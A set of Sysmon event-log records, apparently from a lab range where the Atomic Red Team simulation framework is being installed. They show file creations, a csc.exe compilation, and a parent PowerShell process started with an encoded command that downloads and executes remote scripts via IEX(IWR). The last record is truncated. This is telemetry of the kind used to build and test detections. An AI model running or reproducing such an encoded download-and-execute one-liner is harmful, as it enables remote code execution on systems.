{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4660,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.986\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-KeyValue.ps1\r\nCreationUtcTime: 2020-08-01 07:58:58.986","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.986","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-KeyValue.ps1","CreationUtcTime":"2020-08-01 07:58:58.986","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4661,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.986\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-PrereqResults.ps1\r\nCreationUtcTime: 2020-08-01 07:58:58.986","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.986","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Private\\Write-PrereqResults.ps1","CreationUtcTime":"2020-08-01 07:58:58.986","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:58","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4662,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.986\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Get-AtomicTechnique.ps1\r\nCreationUtcTime: 2020-08-01 07:58:58.986","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.986","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Get-AtomicTechnique.ps1","CreationUtcTime":"2020-08-01 07:58:58.986","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4663,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.986\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-AtomicTest.ps1\r\nCreationUtcTime: 2020-08-01 07:58:58.986","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.986","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-AtomicTest.ps1","CreationUtcTime":"2020-08-01 07:58:58.986","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4664,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.002\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-MalDoc.ps1\r\nCreationUtcTime: 2020-08-01 07:58:59.002","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.002","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-MalDoc.ps1","CreationUtcTime":"2020-08-01 07:58:59.002","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4665,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.002\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-WebRequestVerifyHash.ps1\r\nCreationUtcTime: 2020-08-01 07:58:59.002","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.002","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Invoke-WebRequestVerifyHash.ps1","CreationUtcTime":"2020-08-01 07:58:59.002","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4666,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.002\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\New-Atomic.ps1\r\nCreationUtcTime: 2020-08-01 07:58:59.002","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.002","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\New-Atomic.ps1","CreationUtcTime":"2020-08-01 07:58:59.002","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4667,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.002\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Start-AtomicGUI.ps1\r\nCreationUtcTime: 2020-08-01 07:58:59.002","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.002","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\Public\\Start-AtomicGUI.ps1","CreationUtcTime":"2020-08-01 07:58:59.002","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4668,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.002\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\install-atomicredteam.ps1\r\nCreationUtcTime: 2020-08-01 07:58:59.002","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.002","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\install-atomicredteam.ps1","CreationUtcTime":"2020-08-01 07:58:59.002","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4669,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.002\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\install-atomicsfolder.ps1\r\nCreationUtcTime: 2020-08-01 07:58:59.002","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.002","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\invoke-atomicredteam-master\\install-atomicsfolder.ps1","CreationUtcTime":"2020-08-01 07:58:59.002","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4670,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:58:59.220\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\xuadk0jp\\xuadk0jp.dll\r\nCreationUtcTime: 2020-08-01 07:58:59.220","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:58:59.220","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\xuadk0jp\\xuadk0jp.dll","CreationUtcTime":"2020-08-01 07:58:59.220","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4671,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.220\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\xuadk0jp\\xuadk0jp.cmdline\r\nCreationUtcTime: 2020-08-01 07:58:59.220","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.220","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\xuadk0jp\\xuadk0jp.cmdline","CreationUtcTime":"2020-08-01 07:58:59.220","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4672,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.226\r\nProcessGuid: {41C8662E-20C3-5F25-0000-0010CE130700}\r\nProcessId: 2860\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\xuadk0jp\\xuadk0jp.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BF-5F25-0000-0020C6C20600}\r\nLogonId: 0x6C2C6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nParentProcessId: 4240\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.226","ProcessGuid":"{41C8662E-20C3-5F25-0000-0010CE130700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\xuadk0jp\\xuadk0jp.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BF-5F25-0000-0020C6C20600}","LogonId":"0x6c2c6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","ParentProcessId":"4240","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA==","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4673,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.220\r\nSourceProcessGUID: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nSourceProcessId: 4240\r\nSourceThreadId: 4500\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20C3-5F25-0000-0010CE130700}\r\nTargetProcessId: 2860\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+ead8b800(wow64)|C:\\Windows\\assembly\\Native